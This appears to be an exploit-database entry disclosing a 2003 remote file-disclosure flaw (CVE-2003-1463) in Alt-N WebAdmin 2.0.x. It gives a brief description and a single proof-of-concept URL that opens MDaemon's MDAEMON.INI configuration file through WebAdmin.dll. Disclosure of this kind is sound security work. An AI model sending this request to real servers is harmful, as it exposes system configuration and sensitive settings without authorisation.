Alt-N WebAdmin 2.0.x - Remote File Disclosure
| EKU-ID: 28018 | CVE: CVE-2003-1463;OSVDB-53493 | OSVDB-ID: |
| Author: david@kamborio.net | Published: 2003-04-25 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 28018 | CVE: CVE-2003-1463;OSVDB-53493 | OSVDB-ID: |
| Author: david@kamborio.net | Published: 2003-04-25 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/7439/info Reportedly, remote users can discover the installation directory of certain software on the underlying system by submitting an HTTP request to the WebAdmin server. This could allow an attacker to obtain sensitive information. http://www.example.com/WebAdmin.dll?session=X&Program=MDaemon&Directory:Name=C:\MDaemon\App&File:Name=MDAEMON.INI&View=EditFile